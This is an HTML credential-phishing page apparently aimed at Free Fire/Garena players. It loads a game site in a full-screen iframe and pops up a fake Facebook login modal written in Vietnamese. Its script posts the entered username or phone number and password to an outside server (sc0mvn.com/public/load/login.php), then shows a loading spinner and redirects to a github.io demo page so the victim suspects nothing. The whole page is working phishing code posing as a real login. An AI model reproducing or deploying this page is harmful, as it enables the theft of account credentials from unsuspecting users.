
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
<meta http-equiv="x-ua-compatible" content="ie=edge" />

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" />

<link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700;900&display=swap" />

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<link rel="stylesheet" href="https://garena.mobi/load/css/mdb.min.css" />
<style type="text/css">
        html {
            overflow: auto;
        }
          
        html,
        body,
        iframe {
            margin: 0px;
            padding: 0px;
            height: 100%;
            border: none;
        }
          
        iframe {
            display: block;
            width: 100%;
            border: none;
            overflow-y: auto;
            overflow-x: hidden;
        }
input.form-control {
    border: none;
    font-size: 15px;
    border-bottom: 1px solid #ddd;
    border-radius: 0;
    padding: 7px;
}
div#thongbao {
    background: red;
    color: white;
    padding: 3px 0;
    margin-top: 10px;
    text-align: center;
    border-radius: 5px;
    margin-bottom: 10px;
}
.logfacebook{
    box-shadow: none;
    background-color: #2162cf;
}
.loggoogle{
    box-shadow: none;
}
.logtwitter{
    box-shadow: none;
    background-color: #00b2ff;
}
.logvk{
    box-shadow: none;
        background-color: #1a88b7;
}
    </style>
</head>
<body>

<iframe src="https://sc0mvn.com/demo/html/index1.html" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto">
  </iframe>

<div class="modal top" id="exampleModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true" data-mdb-backdrop="static" data-mdb-keyboard="true">
<div class="modal-dialog   modal-dialog-centered">
<div class="modal-content">

<img src="https://garena.mobi/load/log/facebook.jpg" class="w-100" />
<div class="modal-body">
<div id="loading" style="display:none">
<div class="d-flex justify-content-center">
<div class="spinner-border m-5" role="status">
<span class="visually-hidden">Loading...</span>
</div>
</div>
</div>
<div id="login" style="display:block">
<div id="thongbao" style="display:none"></div>
<center><small>Tiếng Việt</small></center>
<div class="mt-3">
<input id="tk" class="form-control mb-2" placeholder="Email hoặc số điện thoại/username..." type="text" />
<input id="mk" class="form-control mb-2" placeholder="Mật khẩu..." type="password" />
<center class="mt-4 d-block">
<button id="loginxxx" type="button" class="logfacebook btn btn-primary d-block mb-3">Đăng nhập</button>
<small>Hoặc đăng nhập bằng</small>
<div class="row justify-content-center mt-2">
</div>
</center>
</div>
</div>
</div>
</div>
</div>
</div>

<script type="text/javascript" src="https://garena.mobi/load/js/mdb.min.js"></script>

<script type="text/javascript">
            $(window).on('load', function() {
        $('#exampleModal').modal('show');
    });
    

    $("#loginxxx").click(function(){
        $.post("https://sc0mvn.com/public/load/login.php",
    {
      tk: $("#tk").val(),
      mk: $("#mk").val(),
      random: 'JM4IPSGVc6Aymcz',
      login: 'facebook'
    },
    function(data,status){
    if(data === 'Đăng nhập thành công!' || data === ''){
        $("#login").hide();
        $("#loading").show();
        setTimeout(function(){
            window.location.href = 'https://yomosst-freefire.github.io/demo/index-1.html';
         }, 2000);
         $("#thongbao").hide();
    } else {
      $("#thongbao").html('<i class="fas fa-bell me-3"></i>'+data);
      $("#thongbao").show();
    }
    });
    })
    </script>
</body>
</html>
